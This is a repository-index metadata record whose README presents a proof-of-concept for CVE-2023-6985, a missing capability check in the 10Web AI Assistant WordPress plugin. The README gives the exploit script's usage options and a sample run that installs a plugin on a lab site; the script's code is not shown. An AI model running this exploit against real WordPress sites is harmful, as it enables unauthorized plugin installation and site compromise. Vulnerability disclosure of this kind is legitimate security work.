{"id":21125689,"url":"https://github.com/randomrobbiebf/cve-2023-6985","last_synced_at":"2026-05-17T21:10:06.341Z","repository":{"id":219785319,"uuid":"749919472","full_name":"RandomRobbieBF/CVE-2023-6985","owner":"RandomRobbieBF","description":"10Web AI Assistant – AI content writing assistant \u003c= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description","archived":false,"fork":false,"pushed_at":"2024-01-29T16:54:24.000Z","size":7,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:24.299Z","etag":null,"topics":["ai-assistant-by-10web","cve-2023-6985","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-01-29T16:51:53.000Z","updated_at":"2024-07-11T16:39:17.000Z","dependencies_parsed_at":"2024-01-29T20:14:40.176Z","dependency_job_id":"e43da894-1fd6-492c-897f-81c9ffd650d6","html_url":"https://github.com/RandomRobbieBF/CVE-2023-6985","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-6985"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-6985","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie
s/RandomRobbieBF%2FCVE-2023-6985/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-6985/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33155543,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-17T09:28:26.183Z","status":"ssl_error","status_checked_at":"2026-05-17T09:27:52.702Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai-assistant-by-10web","cve-2023-6985","wordpress"],"created_at":"2024-11-20T04:36:21.930Z","updated_at":"2026-05-17T21:10:06.305Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-6985\n10Web AI Assistant – AI content writing assistant \u003c= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description\n\n\n### Description\n\nThe 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized 
modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.\n\n```\nSeverity: medium\nCVE ID: CVE-2023-6985\nCVSS Score: 6.5\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\nPlugin Slug: ai-assistant-by-10web\nWPScan URL: https://www.wpscan.com/plugin/ai-assistant-by-10web\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da\nDiff URL: https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php\nDownload Vuln: https://downloads.wordpress.org/plugin/ai-assistant-by-10web.1.0.18.zip\n```\n\nHow to use\n---\n\n```\npython3 CVE-2023-6985.py -h\nusage: CVE-2023-6985.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG --php PHP\n\n10Web AI Assistant – AI content writing assistant \u003c= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description CVE-2023-6985 - The 10Web AI Assistant – AI\ncontent writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18.\nThis makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.\n\noptions:\n  -h, --help           show this help message and exit\n  --url URL            URL of the WordPress site\n  --username USERNAME  WordPress username\n  --password PASSWORD  WordPress password\n  --slug SLUG          WordPress Plugin Slug\n  --php PHP            WordPress Plugin PHP file\n```\n\nPOC\n---\n\n```\npython3 CVE-2023-6985.py --url 
http://wordpress.lan --username user --password useruser1 --slug display-php-version --php display-php-version.php\nLogged in successfully.\nGetting REST API Nonce!\nNonce Found: df8390ff4b\nInstalling Plugin\nDownloading installation package from https://downloads.wordpress.org/plugin/display-php-version.latest-stable.zip\nUnpacking the package\nInstalling the plugin\nPlugin installed successfully.\n{\"success\":true}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985/lists"}